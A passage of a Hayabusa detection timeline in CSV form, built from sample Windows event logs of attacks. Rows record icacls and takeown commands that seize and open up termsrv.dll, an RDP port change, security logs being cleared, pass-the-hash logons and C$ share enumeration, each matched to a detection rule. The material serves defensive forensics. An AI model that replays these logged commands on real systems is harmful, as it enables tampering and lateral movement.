365ABB72-AB81-5C8E-0000-00102E9E0C00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-18 05:18:12.096 +09:00,PC04.example.corp,1,info,,Process Created,Cmd: UI0Detect.exe 220 | Process: C:\Windows\System32\UI0Detect.exe | User: PC04\IEUser | Parent Cmd: C:\Windows\system32\UI0Detect.exe | LID: 0x3c004 | PID: 600 | PGUID: 365ABB72-AB84-5C8E-0000-00109EAD0C00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-18 05:20:14.512 +09:00,PC04.example.corp,1,info,,Process Created,"Cmd: ""C:\Users\IEUser\Desktop\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch-x86.exe"" | Process: 
C:\Users\IEUser\Desktop\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch-x86.exe | User: PC04\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x3c004 | PID: 4024 | PGUID: 365ABB72-ABFE-5C8E-0000-00105A560D00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-18 05:20:14.512 +09:00,PC04.example.corp,1,low,Exec,Process Start From Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-18 05:20:17.907 +09:00,PC04.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\System32\takeown.exe"" /f C:\Windows\System32\termsrv.dll | Process: C:\Windows\System32\takeown.exe | User: PC04\IEUser | Parent Cmd: ""C:\Users\IEUser\Desktop\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch-x86.exe"" | LID: 0x3c004 | PID: 3708 | PGUID: 365ABB72-AC01-5C8E-0000-001011690D00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-18 05:20:17.917 +09:00,PC04.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\System32\icacls.exe"" C:\Windows\System32\termsrv.dll /grant %%username%%:F | Process: C:\Windows\System32\icacls.exe | User: PC04\IEUser | Parent Cmd: ""C:\Users\IEUser\Desktop\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch-x86.exe"" | LID: 0x3c004 | PID: 3536 | PGUID: 365ABB72-AC01-5C8E-0000-0010296C0D00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-18 05:20:17.917 +09:00,PC04.example.corp,1,medium,Evas,File or Folder Permissions 
Modifications,,../hayabusa-rules/sigma/process_creation/proc_creation_win_file_permission_modifications.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-18 05:20:17.927 +09:00,PC04.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\System32\icacls.exe"" C:\Windows\System32\termsrv.dll /grant *S-1-1-0:(F) | Process: C:\Windows\System32\icacls.exe | User: PC04\IEUser | Parent Cmd: ""C:\Users\IEUser\Desktop\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch-x86.exe"" | LID: 0x3c004 | PID: 3652 | PGUID: 365ABB72-AC01-5C8E-0000-0010656E0D00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-18 05:20:17.927 +09:00,PC04.example.corp,1,medium,Evas,File or Folder Permissions Modifications,,../hayabusa-rules/sigma/process_creation/proc_creation_win_file_permission_modifications.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-18 05:22:59.399 +09:00,PC04.example.corp,13,high,Persis,Changing RDP Port to Non Standard Number,,../hayabusa-rules/sigma/registry_event/win_re_change_rdp_port.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-18 05:23:12.188 +09:00,PC04.example.corp,1,info,,Process Created,Cmd: UI0Detect.exe 220 | Process: C:\Windows\System32\UI0Detect.exe | User: PC04\IEUser | Parent Cmd: C:\Windows\system32\UI0Detect.exe | LID: 0x3c004 | PID: 2972 | PGUID: 365ABB72-ACB0-5C8E-0000-001085D50D00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-18 05:43:12.784 +09:00,PC04.example.corp,1,info,,Process Created,Cmd: UI0Detect.exe 220 | Process: C:\Windows\System32\UI0Detect.exe | User: PC04\IEUser | Parent Cmd: 
C:\Windows\system32\UI0Detect.exe | LID: 0x3c004 | PID: 136 | PGUID: 365ABB72-B160-5C8E-0000-0010253D1500,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_13_keylogger_directx.evtx +2019-03-18 05:43:16.309 +09:00,PC04.example.corp,1,info,,Process Created,Cmd: C:\Windows\System32\slui.exe -Embedding | Process: C:\Windows\System32\slui.exe | User: PC04\IEUser | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x3c004 | PID: 3312 | PGUID: 365ABB72-B164-5C8E-0000-0010543F1500,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_13_keylogger_directx.evtx +2019-03-18 20:06:25.485 +09:00,PC01.example.corp,1102,high,Evas,Security Log Cleared,User: user01,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_4624_mimikatz_sekurlsa_pth_source_machine.evtx +2019-03-18 20:06:29.911 +09:00,PC01.example.corp,4624,info,,Logon Type 9 - NewCredentials,User: user01 | Computer: | IP Addr: ::1 | LID: 0x4530f0f | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-9-NewInteractive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_4624_mimikatz_sekurlsa_pth_source_machine.evtx +2019-03-18 20:06:29.911 +09:00,PC01.example.corp,4672,info,,Admin Logon,User: user01 | LID: 0x4530f0f,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_4624_mimikatz_sekurlsa_pth_source_machine.evtx +2019-03-18 20:06:29.911 +09:00,PC01.example.corp,4624,medium,LatMov,Pass the Hash Activity 2,,../hayabusa-rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_4624_mimikatz_sekurlsa_pth_source_machine.evtx +2019-03-18 
20:06:29.911 +09:00,PC01.example.corp,4624,high,LatMov,Successful Overpass the Hash Attempt,,../hayabusa-rules/sigma/builtin/security/win_overpass_the_hash.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_4624_mimikatz_sekurlsa_pth_source_machine.evtx +2019-03-18 20:27:00.438 +09:00,PC01.example.corp,1102,high,Evas,Security Log Cleared,User: user01,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMIC_4648_rpcss.evtx +2019-03-18 20:27:23.231 +09:00,PC01.example.corp,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: user01 | Target User: administrator | IP Address: - | Process: C:\Windows\System32\svchost.exe | Target Server: RPCSS/WIN-77LTAPHIQ1R.example.corp,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMIC_4648_rpcss.evtx +2019-03-18 20:27:23.261 +09:00,PC01.example.corp,4648,medium,PrivEsc | LatMov,Explicit Logon: Suspicious Process,Src User: user01 | Tgt User: administrator | IP Addr: - | Process: C:\Windows\System32\wbem\WMIC.exe | Tgt Svr: host/WIN-77LTAPHIQ1R.example.corp,../hayabusa-rules/hayabusa/default/alerts/Security/4648_ExplicitLogon_SuspiciousProcess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMIC_4648_rpcss.evtx +2019-03-18 20:27:23.261 +09:00,PC01.example.corp,4648,medium,LatMov,Suspicious Remote Logon with Explicit Credentials,,../hayabusa-rules/sigma/builtin/security/win_susp_logon_explicit_credentials.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMIC_4648_rpcss.evtx +2019-03-18 20:27:23.271 +09:00,PC01.example.corp,4648,medium,PrivEsc | LatMov,Explicit Logon: Suspicious Process,Src User: user01 | Tgt User: administrator | IP Addr: - | Process: C:\Windows\System32\wbem\WMIC.exe | Tgt Svr: 
WIN-77LTAPHIQ1R.example.corp,../hayabusa-rules/hayabusa/default/alerts/Security/4648_ExplicitLogon_SuspiciousProcess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMIC_4648_rpcss.evtx +2019-03-18 20:27:23.271 +09:00,PC01.example.corp,4648,medium,LatMov,Suspicious Remote Logon with Explicit Credentials,,../hayabusa-rules/sigma/builtin/security/win_susp_logon_explicit_credentials.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMIC_4648_rpcss.evtx +2019-03-18 23:23:22.264 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:22.284 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Program Files\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:22.284 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.356 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: BGinfo | IP Addr: 10.0.2.15 | LID: 
0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.546 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.546 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.556 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$ | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.556 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Contacts\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.556 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share 
Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Desktop\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.556 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Documents\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.566 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Downloads\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.566 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Favorites\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.566 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 
0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.566 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Music\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.566 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Pictures\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.576 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Saved Games\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.576 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Searches\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.576 
+09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Videos\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.576 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Contacts | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.586 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Desktop | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.586 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Documents | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.586 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Downloads | IP Addr: 10.0.2.15 | LID: 
0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.586 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Favorites | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.586 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Favorites\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.586 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Favorites\Links for United States\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.596 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Favorites\Links | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.596 
+09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Favorites\Links for United States | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.596 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Links | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.596 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Music | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.596 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Pictures | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.606 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Saved Games | IP Addr: 10.0.2.15 | LID: 
0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.606 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Searches | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.606 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Videos | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.606 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01 | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.606 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Contacts\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.616 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: 
Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Desktop\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.616 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Documents\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.616 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Downloads\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.616 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Favorites\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.616 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 
